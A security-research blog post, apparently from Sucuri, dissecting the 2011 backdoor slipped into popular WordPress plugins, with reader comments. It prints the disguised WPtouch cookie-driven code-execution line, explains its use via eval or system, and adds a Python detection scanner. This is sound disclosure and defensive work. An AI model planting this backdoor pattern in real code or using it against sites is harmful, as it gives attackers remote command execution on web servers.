Sucuri Blog

WordPress plugins hacked – Understanding the backdoor

June 22, 2011 | David Dede

If you haven’t heard about it already, yesterday three popular WordPress plugins (AddThis, WPtouch, and W3 Total Cache) had a malicious backdoor added to them via the plugin repository. That led to WordPress.org resetting all passwords as a precaution. You can read about it here: Passwords Reset. I must note that the WP.org team did an amazing job dealing with this incident and getting it all fixed very fast!

However, what is interesting to us is what the WordPress.org team said:

Earlier today the WordPress team noticed suspicious commits to several popular plugins (AddThis, WPtouch, and W3 Total Cache) containing cleverly disguised backdoors.

Cleverly disguised backdoors? That’s something we wanted to check. We went to their repositories and found this in the WPtouch changelog:

 // Backdoor inserted into WPtouch: the cookie value is matched as "useragent/<name>/<arg>/",
 // and $matches[1]($matches[2]) calls the captured name as a PHP function with the captured argument.
 if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))
     $this->desired_view = $matches[1].$matches[2];

What does this code do?

Someone skimming through the code may not see anything with malicious intent there. However, it checks whether a specific cookie is set and, if it is, parses the cookie's content into the $matches array. After that, it executes the code by calling $matches[1]($matches[2]). That is possible because PHP allows a variable holding a string to be called as a function (so $matches[1] is the function name and $matches[2] is its argument).

So someone could set the cookie to eval, or even system/exec, and run any command on the target site as the web server user.
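To help find this pattern in a plugin tree, here is an added example (not code from the original post or from the WordPress team): a small Python scanner, with a hypothetical scan_php function, that flags PHP lines where a preg_match over a request superglobal fills an array whose element is later called as a variable function, and also lines that call a superglobal value directly. The sample it runs on is constructed and embeds the WPtouch lines beside two benign uses.

```python
import re

# Request superglobals whose values an attacker fully controls.
TAINTED = r"\$_(?:COOKIE|GET|POST|REQUEST)"

# preg_match(..., $_COOKIE[...], $matches): captures from request input land in $matches.
PREG_ON_INPUT = re.compile(
    r"preg_match\s*\([^;]*?" + TAINTED + r"[^;]*?,\s*(\$\w+)\s*\)"
)
# $matches[1](...): an array element used as a variable function name.
ARRAY_ELEMENT_CALL = re.compile(r"(\$\w+)\[\s*\d+\s*\]\s*\(")
# $_COOKIE['x'](...): a superglobal value called directly as a function.
DIRECT_CALL = re.compile(TAINTED + r"\s*\[[^\]]*\]\s*\(")


def scan_php(source):
    """Return (line_number, reason) for lines where request input reaches a variable function call."""
    findings = []
    tainted_arrays = set()  # $matches-style arrays filled from request input earlier in the file
    for lineno, line in enumerate(source.splitlines(), 1):
        hit = PREG_ON_INPUT.search(line)
        if hit:
            tainted_arrays.add(hit.group(1))
        for call in ARRAY_ELEMENT_CALL.finditer(line):
            if call.group(1) in tainted_arrays:
                findings.append((lineno, f"{call.group(1)} is filled from request input and called as a function"))
        if DIRECT_CALL.search(line):
            findings.append((lineno, "request superglobal value is called as a function"))
    return findings


# Constructed sample: the WPtouch backdoor lines beside a benign preg_match and a benign variable function.
SAMPLE_PHP = r"""
if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))
    $this->desired_view = $matches[1].$matches[2];
if (preg_match("/^[a-z]+$/", $_GET['view'], $m))
    $view = $m[0];
$callback = 'sanitize_title';
echo $callback($title);
"""

if __name__ == "__main__":
    for lineno, reason in scan_php(SAMPLE_PHP):
        print(f"line {lineno}: {reason}")
```

Only the WPtouch line is reported; the benign preg_match and the constant-string callback are not. Treat hits as triage leads to read by hand, since the regexes are line-based and do not follow data flow across statements.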

Kudos to the WordPress Core Team

Again, a very clever backdoor, and I am impressed that the WordPress team caught this in the middle of so many plugins and commits. I wasn’t able to check the other plugins, because it seems that plugins.trac.wordpress.org is down at the moment.

Another thing to highlight, which Matt stated in the news release on WordPress.org, is to make sure you update your plugins. By keeping your software up to date, you have the latest patches and security fixes, which in turn lowers your risk of security issues.

If you are worried your site might have been hacked, try scanning it with Sucuri SiteCheck to see if there is anything wrong.

Categories: Vulnerability Disclosure, WordPress Security
Tags: Website Backdoor, WordPress Plugins and Themes

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. Justin Sternberg

    June 22, 2011

    Found this code in two footer.php files in a multi-site environment: http://d.pr/W60r  Pretty sure it’s because I updated to the bad version of AddThis.  Also had a bunch of new folders/files in the uploads folder.

    • Justin Sternberg

      June 23, 2011

      so the code found in my footer.php files had nothing to do with these three plugins, but rather with “WP-phpmyadmin WordPress plugin” that you reported on here: https://blog.sucuri.net/2011/06/wp-phpmyadmin-wordpress-plugin-delete-it-now.html

  2. Christopher Ross

    June 23, 2011

    Both the core team and the volunteers at WordPress.org deserve a huge thank you for catching this, it could have been a lot worse.

  3. Webbie

    July 12, 2011

    Kudos to the WordPress.org core team and all the volunteers of WordPress.
    Please keep this up as most of us are not code-savvy.

  4. Nusa Herba

    June 28, 2013

    I’m happy because WordPress is constantly updating its technology, especially for security.